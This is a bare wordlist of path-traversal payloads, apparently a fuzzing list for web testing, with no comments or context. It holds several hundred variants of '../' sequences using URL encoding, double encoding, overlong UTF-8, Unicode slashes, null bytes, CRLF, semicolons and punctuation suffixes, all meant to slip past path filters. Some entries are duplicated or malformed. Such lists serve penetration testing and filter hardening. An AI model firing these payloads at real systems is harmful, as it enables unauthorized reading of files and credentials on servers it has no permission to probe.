..
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
....
....//
..../
....\/
..;/
...\
.../
..%2f
..%252f
..%5c
..%255c
%2e%2e/
%2e%2e%2f
%252e%252e/
%252e%252e%252f
..%00
..%0d
..%0a
..%00/
..%0d/
..%0a/
..%u2216
..%c0%af
..%c1%9c
..%c0%2f
..%c0%5c
..%e0%80%af
..%f0%80%80%af
..%u2215
..%uff0f
..%u2216
.%2e/
.%252e/
%2e./
%252e./
%2e%2e%2f
%252e%252e%252f
..\\
..\
..\/
.%2e\
.%2e%5c
%2e.%5c
%2e%2e%5c
..%255c
..%u2216
..%u2215
..%c0%af
..%c1%1c
..%c1%9c
..%c1%pc
..%c0%9v
..%c0%qf
..%c1%8s
..%c1%1c
..%c1%af
..%c0%2f
..%c0%5c
..%e0%80%af
..%f0%80%80%af
..%f8%80%80%80%af
..%fc%80%80%80%80%af
..%u2216
..%uff0f
0x2e0x2e/
0x2e0x2e0x2f
..%01
..%ff
..;/
..;//
..\;
..\/;
..\..
..\../
..\..\..\
..%5c..
..%5c..%5c
..%5c..%5c..
..%5c..%5c..%5c
..%252f..
..%252f..%252f
..%252f..%252f..
..%252f..%252f..%252f
.%00.
.%00./
.%00./.%00.
..%00/..%00/
..%20
..%09
..%0d%0a
.%0a.
.%0d.
..;%00
..;/var
..;/etc
..;/tmp
..;/usr
..;/bin
..%00.jpg
..%00.png
..%00.gif
..%00.pdf
..%00.txt
....//
....\/
.....
......
.......
........
..%2f..
..%2f..%2f
..%2f..%2f..
..%2f..%2f..%2f
..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f
..%5c..
..%5c..%5c
..%5c..%5c..
..%5c..%5c..%5c
..%5c..%5c..%5c..
..%5c..%5c..%5c..%5c
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%255c
%252e%252e%255c%252e%252e%255c
..%c0%af..
..%c0%af..%c0%af
..%c1%9c..
..%c1%9c..%c1%9c
..%e0%80%af..
..%e0%80%af..%e0%80%af
..%f0%80%80%af..
..%f0%80%80%af..%f0%80%80%af
..%uff0f..
..%uff0f..%uff0f
..%u2216..
..%u2216..%u2216
./../
.\..\
.\\..\
.//..//
.\/\.\/
.%2e/.%2e/
.%2e\.%2e\
%2e./. %2e/
%2e./.%2e/
%2e%2e/.%2e%2e/
%2e%2e\.%2e%2e\
..////
..\\\\
..\//\
..//\\
..;/../
..;\..\
..;/;/
..;\;\
..%00/..%00/
..%00\..%00\
..?
..??
..???
..#
..##
..###
..*
..**
..***
..!
..!!
..!!!
..@
..@@
..@@@
..$
..$$
..$$$
..^
..^^
..^^^
..&
..&&
..&&&
..(
..((
..)
..))
..[
..[[
..]
..]]
..{
..{{
..}
..}}
..|
..||
..~
..~~
..`
..``
..+
..++
..=
..==
..-
..--
.._
..__
../;
..\;
..%;
..&;
../!
..\!
..%!
..&!
../?
..\?
..%?
..&?
../#
..\#
..%#
..&#
../$
..\$
..%$
..&$
../*
..\*
..%*
..&*
../@
..\@
..%@
..&@
../^
..\^
..%^
..&^
../&
..\&
..%&
..&&
../(
..\(
..%(
..&(
../)
..\)
..%)
..&)
../[
..\[
..%[
..&[
../]
..\]
..%]
..&]
../{
..\{
..%{
..&{
../}
..\}
..%}
..&}
../|
..\|
..%|
..&|
../~
..\~
..%~
..&~
../`
..\`
..%`
..&`
../+
..\+
..%+
..&+
../=
..\=
..%=
..&=
../-
..\-
..%-
..&-
../_
..\\_
..%_
..&_
